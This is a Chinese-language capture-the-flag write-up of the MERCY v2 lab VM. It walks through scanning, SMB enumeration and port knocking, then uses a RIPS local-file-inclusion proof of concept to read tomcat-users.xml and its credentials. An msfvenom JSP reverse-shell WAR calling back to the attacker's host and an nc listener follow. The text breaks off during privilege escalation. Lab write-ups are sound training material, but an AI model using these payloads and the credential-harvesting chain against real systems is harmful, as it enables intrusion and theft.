红队打靶练习:DIGITALWORLD.LOCAL: MERCY V2

目录

信息收集

1、arp

2、netdiscover

3、nmap

4、nikto

5、whatweb

6、总结

目录探测

1、gobuster

2、dirsearch

WEB

enum4linux枚举工具

smbclient工具

knock工具

CMS

文件包含漏洞

Tomcat

提权

系统信息收集

本地提权

get root


信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.142  00:50:56:3e:71:fc       VMware, Inc.
192.168.12.254  00:50:56:ec:a5:ce       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.346 seconds (109.12 hosts/sec). 4 responded

2、netdiscover
netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 7 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 420
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      4     240  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.142  00:50:56:3e:71:fc      1      60  VMware, Inc.
 192.168.12.254  00:50:56:ec:a5:ce      1      60  VMware, Inc.


3、nmap
主机存活探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-22 15:04 CST
Nmap scan report for 192.168.12.1
Host is up (0.00023s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.00011s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.142
Host is up (0.00013s latency).
MAC Address: 00:50:56:3E:71:FC (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:EC:A5:CE (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 6.42 seconds


端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.142 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-22 15:05 CST
Nmap scan report for 192.168.12.142
Host is up (0.0036s latency).
Not shown: 65525 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   filtered ssh
53/tcp   open     domain
80/tcp   filtered http
110/tcp  open     pop3
139/tcp  open     netbios-ssn
143/tcp  open     imap
445/tcp  open     microsoft-ds
993/tcp  open     imaps
995/tcp  open     pop3s
8080/tcp open     http-proxy
MAC Address: 00:50:56:3E:71:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.93 seconds

┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | head -n 15 | tail -n 10 | awk -F "/" '{print $1}' | xargs -n 10 | sed 's/ /,/g'
22,53,80,110,139,143,445,993,995,8080


信息探测


┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 22,53,80,110,139,143,445,993,995,8080 192.168.12.142 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-22 15:07 CST
Nmap scan report for 192.168.12.142
Host is up (0.00035s latency).

PORT     STATE  SERVICE     VERSION
22/tcp   closed ssh
53/tcp   open   domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp   closed http
110/tcp  open   pop3?
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA UIDL SASL TOP RESP-CODES AUTH-RESP-CODE PIPELINING STLS
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open   imap        Dovecot imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_imap-capabilities: ENABLE Pre-login STARTTLS have post-login ID IMAP4rev1 listed LOGINDISABLEDA0001 capabilities OK IDLE more LITERAL+ LOGIN-REFERRALS SASL-IR
445/tcp  open   netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open   ssl/imap    Dovecot imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_imap-capabilities: Pre-login AUTH=PLAINA0001 ENABLE have ID IMAP4rev1 listed post-login capabilities OK IDLE more LITERAL+ LOGIN-REFERRALS SASL-IR
995/tcp  open   ssl/pop3
|_pop3-capabilities: CAPA UIDL SASL(PLAIN) USER RESP-CODES AUTH-RESP-CODE PIPELINING TOP
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
| fingerprint-strings:
|   afp:
|_    +OK Dovecot (Ubuntu) ready.
8080/tcp open   http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-title: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_  Potentially risky methods: PUT DELETE
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port995-TCP:V=7.94SVN%T=SSL%I=7%D=12/22%Time=6585367B%P=x86_64-pc-linux
SF:-gnu%r(afp,1D,"\+OK\x20Dovecot\x20\(Ubuntu\)\x20ready\.\r\n");
MAC Address: 00:50:56:3E:71:FC (VMware)
Aggressive OS guesses: Linux 4.4 (96%), Linux 3.10 - 4.11 (93%), Linux 3.16 - 4.6 (93%), Linux 2.6.32 (92%), Linux 3.11 - 4.1 (92%), Linux 3.13 (91%), Linux 3.2 - 4.9 (90%), Linux 4.10 (89%), Linux 5.1 (89%), Linux 3.2 - 3.8 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2023-12-22T07:10:55
|_  start_date: N/A
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: mercy
|   NetBIOS computer name: MERCY\x00
|   Domain name: \x00
|   FQDN: mercy
|_  System time: 2023-12-22T15:10:55+08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.12.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.33 seconds


漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,53,80,110,139,143,445,993,995,8080 192.168.12.142 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-22 15:07 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.142
Host is up (0.00021s latency).

PORT     STATE    SERVICE
22/tcp   filtered ssh
53/tcp   open     domain
80/tcp   filtered http
110/tcp  open     pop3
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
139/tcp  open     netbios-ssn
143/tcp  open     imap
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: LIKELY VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
|       TLS_FALLBACK_SCSV properly implemented
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|_      https://www.openssl.org/~bodo/ssl-poodle.pdf
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
445/tcp  open     microsoft-ds
993/tcp  open     imaps
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: LIKELY VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_FALLBACK_SCSV properly implemented
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|_      https://www.openssl.org/~bodo/ssl-poodle.pdf
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
995/tcp  open     pop3s
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: LIKELY VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_FALLBACK_SCSV properly implemented
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|_      https://www.openssl.org/~bodo/ssl-poodle.pdf
8080/tcp open     http-proxy
| http-enum:
|   /examples/: Sample scripts
|   /robots.txt: Robots file
|   /manager/html/upload: Apache Tomcat (401 Unauthorized)
|   /manager/html: Apache Tomcat (401 Unauthorized)
|_  /docs/: Potentially interesting folder
MAC Address: 00:50:56:3E:71:FC (VMware)

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false

Nmap done: 1 IP address (1 host up) scanned in 185.37 seconds

4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.142:8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.12.142
+ Target Hostname:    192.168.12.142
+ Target Port:        8080
+ Start Time:         2023-12-22 15:08:03 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /manager/html: Default Tomcat Manager / Host Manager interface found.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/status: Default Tomcat Server Status interface found.
+ 8407 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2023-12-22 15:08:20 (GMT8) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

5、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.142:8080
WhatWeb report for http://192.168.12.142:8080
Status    : 200 OK
Title     : Apache Tomcat
IP        : 192.168.12.142
Country   : RESERVED, ZZ

Summary   : Apache-Tomcat, Apache, HTTPServer[Apache-Coyote/1.1]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Apache-Tomcat ]
        Apache Tomcat Web Server

        Aggressive function available (check plugin file or details).
        Website     : http://tomcat.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        String       : Apache-Coyote/1.1 (from server string)

HTTP Headers:
        HTTP/1.1 200 OK
        Server: Apache-Coyote/1.1
        Accept-Ranges: bytes
        ETag: W/"1895-1535117025000"
        Last-Modified: Fri, 24 Aug 2018 13:23:45 GMT
        Content-Type: text/html
        Content-Length: 1895
        Date: Fri, 22 Dec 2023 07:08:20 GMT
        Connection: close

6、总结
PORT     STATE    SERVICE
22/tcp   filtered ssh                  ssh服务处于关闭状态                     ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
53/tcp   open     domain               53端口一般用于DNS服务                   
80/tcp   filtered http                 80端口是web应用服务,但是这里处于关闭状态!
110/tcp  open     pop3                 pop3服务是邮件服务。一种通信协议!
139/tcp  open     netbios-ssn          139端口一般开放的都是文件共享服务,和445端口一起搭配使用!
143/tcp  open     imap                 143端口,它是一种用于电子邮件客户端和邮件服务器之间的通信协议。
445/tcp  open     microsoft-ds         445端口,smb服务                       netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open     imaps                993端口,它是一种通过SSL或TLS加密保护的安全IMAP通信协议
995/tcp  open     pop3s                995端口,通常用于POP3S(POP3 Secure)服务,它是一种通过SSL或TLS加密保护的安全POP3通信协议
8080/tcp open     http-proxy           8080端口,通常用于HTTP代理服务。开放的8080端口表示系统上运行着HTTP代理服务器,允许客户端通过该端口进行HTTP请求的中继。

说明靶机运行者POP3S服务器!开着8080端口表示靶机运行着http代理服务器!

目录探测

1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.12.142:8080 -t 25 -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.12.142:8080
[+] Method:                  GET
[+] Threads:                 25
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1895]
/docs                 (Status: 302) [Size: 0] [--> http://192.168.12.142:8080/docs/]
/examples             (Status: 302) [Size: 0] [--> http://192.168.12.142:8080/examples/]
/robots.txt           (Status: 200) [Size: 45]
/manager              (Status: 302) [Size: 0] [--> http://192.168.12.142:8080/manager/]
===============================================================
Finished
===============================================================

2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.142:8080 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.12.142_8080/_23-12-22_15-43-14.txt

Target: http://192.168.12.142:8080/

[15:43:14] Starting:
[15:43:20] 400 -    0B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[15:43:21] 400 -    0B  - /a%5c.aspx
[15:43:44] 302 -    0B  - /docs  ->  http://192.168.12.142:8080/docs/
[15:43:44] 200 -   18KB - /docs/
[15:43:46] 302 -    0B  - /examples  ->  http://192.168.12.142:8080/examples/
[15:43:46] 200 -  688B  - /examples/jsp/snp/snoop.jsp
[15:43:46] 200 -    1KB - /examples/servlets/servlet/RequestHeaderExample
[15:43:46] 200 -    1KB - /examples/websocket/index.xhtml
[15:43:47] 200 -    5KB - /examples/servlets/index.html
[15:43:46] 200 -    1KB - /examples/
[15:43:46] 200 -  714B  - /examples/servlets/servlet/CookieExample
[15:43:47] 200 -   19KB - /examples/jsp/index.html
[15:43:51] 401 -    2KB - /host-manager/html
[15:43:51] 302 -    0B  - /host-manager/  ->  http://192.168.12.142:8080/host-manager/html
[15:43:58] 302 -    0B  - /manager  ->  http://192.168.12.142:8080/manager/
[15:43:58] 302 -    0B  - /manager/  ->  http://192.168.12.142:8080/manager/html
[15:43:58] 401 -    2KB - /manager/html
[15:43:58] 404 -    2KB - /manager/admin.asp
[15:43:58] 401 -    2KB - /manager/html/
[15:43:58] 401 -    2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[15:43:58] 401 -    2KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[15:43:58] 401 -    2KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[15:43:58] 401 -    2KB - /manager/jmxproxy/?qry=STUFF
[15:43:58] 404 -    2KB - /manager/login
[15:43:58] 401 -    2KB - /manager/jmxproxy
[15:43:58] 401 -    2KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[15:43:58] 404 -    2KB - /manager/login.asp
[15:43:58] 404 -    2KB - /manager/VERSION
[15:43:58] 401 -    2KB - /manager/status/all
[15:43:58] 401 -    2KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[15:44:06] 200 -   45B  - /robots.txt

Task Completed

WEB


它有效!
如果您通过web浏览器看到此页面,则表示您已成功设置Tomcat。祝贺
这是默认的Tomcat主页。它可以在本地文件系统上找到:/var/lib/tomcat7/webapps/ROOT/index.html
Tomcat7的老手们可能会很高兴地了解到,Tomcat的此系统实例与CATALINA_HOME一起安装在/usr/share/Tomcat7中,CATALINA_BASE安装在/var/lib/Tomcat 7中,遵循/usr/share/doc/Tomcat7-common/RUNNING.txt.gz中的规则。
如果您还没有安装以下软件包,您可能会考虑安装:
tomcat7docs:这个包安装了一个web应用程序,该应用程序允许在本地浏览tomcat7文档。安装后,您可以单击此处访问它。
tomcat7示例:此包安装了一个web应用程序,该应用程序允许访问Tomcat7Servlet和JSP示例。安装后,您可以单击此处访问它。
tomcat7 admin:这个包安装了两个web应用程序,可以帮助管理这个Tomcat实例。安装后,您可以访问管理器网络应用程序和主机管理器网络程序。
注意:出于安全原因,manager-webapp仅限于角色为“manager-gui”的用户使用。

!!!主机管理器Web应用程序仅限于角色为“admin gui”的用户。用户是在/etc/tomcat7/tomcat-Users.xml中定义的。


8080端口开放的是tomcat服务。版本是7.0.52  




It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.
Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.
No fluffy bunnies for those who set insecure passwords and endanger the enterprise.


译:

这很烦人,但我们一遍又一遍地重复这一点:网络卫生极其重要。请停止设置愚蠢的密码,这些密码会被任何像样的密码列表破解。
有一次,我们发现了密码“password”,真的贴在了员工桌子前的一个便利贴上!尽管这可能很愚蠢,但当我们威胁要解雇她时,这位员工求饶了。
对于那些设置不安全密码并危及企业的人来说,没有毛茸茸的兔子。

敏感信息:  password

enum4linux枚举工具

 enum4linux 192.168.12.142


共享目录qiu


发现四个用户

pleadformercy、qiu、thisisasuperduperlonguser、fluffy


smbclient工具

smbclient \\\\192.168.12.142/qiu -U qiu


密码的话之前,我们base64解码得到的敏感信息 --> password就是密码!

smb: \.private\>
smb: \.private\> ls
  .                                   D        0  Mon Aug 27 00:35:34 2018
  ..                                  D        0  Sat Sep  1 03:07:00 2018
  opensesame                          D        0  Fri Aug 31 00:36:50 2018
  readme.txt                          N       94  Sun Aug 26 22:22:35 2018
  secrets                             D        0  Tue Nov 20 01:01:09 2018

                19213004 blocks of size 1024. 16244864 blocks available
smb: \.private\> cd opensesame
smb: \.private\opensesame\> get config
getting file \.private\opensesame\config of size 17543 as config (5710.4 KiloBytes/sec) (average 3817.3 KiloBytes/sec)
smb: \.private\opensesame\>

在private目录下知道到  readme.txt   ,在 opensesame  目录下找到  config。

使用get命令把他们下载到本地即可!

例:get config

┌──(root㉿ru)-[~/kali]
└─# cat readme.txt
This is for your own eyes only. In case you forget the magic rules for remote administration.

这只是你自己的眼睛。以防您忘记了远程管理的神奇规则。

config文件里面是敲门服务用的顺序码

┌──(root㉿ru)-[~/kali]
└─# cat config
Here are settings for your perusal.

Port Knocking Daemon Configuration

[options]
        UseSyslog

[openHTTP]
        sequence    = 159,27391,4
        seq_timeout = 100
        command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
        tcpflags    = syn

[closeHTTP]
        sequence    = 4,27391,159
        seq_timeout = 100
        command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
        tcpflags    = syn

[openSSH]
        sequence    = 17301,28504,9999
        seq_timeout = 100
        command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags    = syn

[closeSSH]
        sequence    = 9999,28504,17301
        seq_timeout = 100
        command     = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags    = syn



所以开启http服务的就是  : 159,27391,4

开启ssh服务的就是:  17301,28504,9999

knock工具

┌──(root㉿ru)-[~/kali]
└─# knock -v 192.168.12.142 17301:tcp 28504:tcp 9999:tcp
hitting tcp 192.168.12.142:17301
hitting tcp 192.168.12.142:28504
hitting tcp 192.168.12.142:9999



┌──(root㉿ru)-[~/kali]
└─# knock -v 192.168.12.142 159:tcp 27391:tcp 4:tcp
hitting tcp 192.168.12.142:159
hitting tcp 192.168.12.142:27391
hitting tcp 192.168.12.142:4


┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.142 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-22 16:32 CST
Nmap scan report for 192.168.12.142
Host is up (0.0028s latency).
Not shown: 65525 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
993/tcp  open  imaps
995/tcp  open  pop3s
8080/tcp open  http-proxy
MAC Address: 00:50:56:3E:71:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.85 seconds

此时发现,22和80端口都已经打开了!

CMS



RIPS 0.53


Welcome to Mercy!

We hope you do not plead for mercy too much. If you do, please help us upgrade our website to allow our visitors to obtain more than just the local time of our system.



欢迎来到Mercy!
我们希望你不要过于求饶。如果您这样做了,请帮助我们升级我们的网站,让我们的访问者获得的不仅仅是我们系统的本地时间。


文件包含漏洞


paylaod

# RIPS <= 0.53 Multiple Local File Inclusion Vulnerabilities
# Google Dork: allintitle: "RIPS - A static source code analyser for
vulnerabilities in PHP scripts"
# Althout this script is not intended to be accesible from internet, there
are some websites that host it.
# Download: http://sourceforge.net/projects/rips-scanner/
# Date: 23/03/12
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar


File: /windows/code.php
=======================

102: file $lines = file($file);
    96: $file = $_GET['file'];

PoC:
http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd

File: /windows/function.php
===========================

    64: file $lines = file($file);
        58: $file = $_GET['file'];

PoC:
http://localhost/rips/windows/function.php?file=../../../../../../etc/passwd(will
read the first line of the file)

直接谷歌搜索发现,该cms存在文件包含漏洞!


果真如此!我们尝试读取之前的关键信息   -->   /etc/tomcat7/tomcat-Users.xml

注意这个Users.xml 要小写  ————》 users.html


发现账号密码

thisisasuperduperlonguser : heartbreakisinevitable

fluffy :  freakishfluffybunny


经过尝试,ssh登录不上去,应该是tomcat的账号密码!

Tomcat



直接使用msfvenom生成一个反弹shell木马。然后上传war包!

┌──(root㉿ru)-[~/kali]
└─# msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.12.128 lport=
1234 -f war -o shell.war
Payload size: 1096 bytes
Final size of war file: 1096 bytes
Saved as: shell.war



记得开启监听并点击!

┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.12.142: inverse host lookup failed: Unknown host
connect to [192.168.12.128] from (UNKNOWN) [192.168.12.142] 48678
id
uid=116(tomcat7) gid=126(tomcat7) groups=126(tomcat7)

提权

系统信息收集
whereis python
python: /usr/bin/python /usr/bin/python3.4m /usr/bin/python3.4 /usr/bin/python2.7 /etc/python /etc/python3.4 /etc/python2.7 /usr/lib/python3.4 /usr/lib/python2.7 /usr/local/lib/python3.4 /usr/local/lib/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat7@MERCY:/var/lib/tomcat7$ pwd
pwd
/var/lib/tomcat7

tomcat7@MERCY:/$ sudo -l
sudo -l
[sudo] password for tomcat7: 1

Sorry, try again.
[sudo] password for tomcat7: 2

Sorry, try again.
[sudo] password for tomcat7: 3

Sorry, try again.
sudo: 3 incorrect password attempts
tomcat7@MERCY:/$


没有sudo权限,我们先切换一下用户(fluffy)

tomcat7@MERCY:/$ su fluffy
su fluffy
Password: freakishfluffybunny

Added user fluffy.

$ id
id
uid=1003(fluffy) gid=1003(fluffy) groups=1003(fluffy)
$

fluffy@MERCY:/$ sudo -l
sudo -l
[sudo] password for fluffy: freakishfluffybunny

Sorry, user fluffy may not run sudo on MERCY.
fluffy@MERCY:/$


很可惜,这个用户也没有sudo权限!

